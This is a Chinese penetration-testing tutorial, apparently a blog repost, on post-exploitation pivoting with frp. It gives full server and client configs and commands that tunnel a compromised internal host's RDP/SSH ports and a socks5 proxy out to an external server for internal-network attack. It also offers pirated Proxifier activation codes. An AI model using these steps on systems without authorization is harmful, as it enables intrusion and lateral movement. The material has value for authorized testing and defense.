目录
frp简介
frp是一个可用于内网穿透的高性能的反向代理应用,支持tcp、udp、http、https协议。frp分为客户端frpc和服务器端frps,客户端用于内网主机,服务器端用于公网服务器。
环境搭建
- frp软件下载 https://github.com/fatedier/frp/releases
- proxifier(socks代理软件) https://www.proxifier.com/download/
- 内网主机 10.0.0.2
- 公网服务器 121.36.20.179
- 自己电脑 192.168.1.2
配置教程
服务器端配置
由于在后渗透测试阶段,我们拿到了administrator权限,由于内网主机3389只允许内网连接,这个时候我们就可以利用frp把内网主机的3389端口映射到我们公网服务器的5000端口,然后我们使用自己的电脑连接公网服务器的5000端口,从而远程登陆内网主机。
1.首先我们上传frps.exe(frp服务器端)以及frps.ini(服务器端配置文件)到公网服务器上,然后我们执行 frps.exe -c frps.ini 命令,启动frp服务器端,启动前需要修改配置文件,代码如下:
服务器端配置 [common] # frp监听的端口,默认是7000,可以改成其他的 bind_port = 7000 # 授权码,请改成更复杂的,这个token之后在客户端会用到 token =12345678 # frp管理后台端口,请按自己需求更改 dashboard_port = 7500 # frp管理后台用户名和密码,请改成自己的 dashboard_user = admin dashboard_pwd = admin enable_prometheus = true
2.可以看到服务器端启动成功,然后我们访问7500端口,输入账号密码,可以看到管理端启动成功。
客户端配置
.首先我们上传frpc.exe(frp客户端)以及frpc.ini(客户端配置文件)到内网主机电脑上,启动前需要修改配置文件,代码如下:
# 客户端配置 [common] server_addr = 服务器ip # 与frps.ini的bind_port一致 server_port = 7000 # 与frps.ini的token一致 token = 12345678 # 配置ssh服务, 也可以用来映射其他端口如3389 [ssh] type = tcp local_ip = 127.0.0.1 local_port = 22 # 这个remote_port端口自定义,配置完成后会在公网服务器开启6000端口,来映射内网主机22端口 remote_port = 6000 #socks5代理配置 ,一般这个用途比较多 [socks5] type=tcp plugin=socks5 # socks代理账号密码,需要修改不要使用弱口令 plugin_user=admin plugin_passwd=admin #映射到共外网服务器的端口 remote_port = 8000
2.然后我们配置frpc.ini中的服务器ip,然后运行 frpc.exe -c frpc.ini 命令,可以看到连接成功
socks5代理配置
1.当我们在客户端配置文件中使用了socks5,当我们运行命令连接服务器时,会提示"sock5 start proxy success"
2.然后我们安装proxifier(由于软件付费,需要激活码的粉丝可以私信我),安装完成后代开proxifier配置socks代理,首先我们点击"Profile"中的"Proxy Servers"
2.然后我们选择添加,然后输入 公网服务器的IP地址和端口,以及frpc.ini文件中的socks5账号和密码 。
3.然后点击"ok",之后会弹窗,然后点击"是"
4.然后我们就完成了socks5代理配置,现在自己的电脑全部的流量都会通过内网主机代理出去,我们就可以直接访问内网主机的内网,以及配置渗透工具进行内网渗透。可以看到代理检测成功。
原文链接:https://blog.csdn.net/smli_ng/article/details/126750072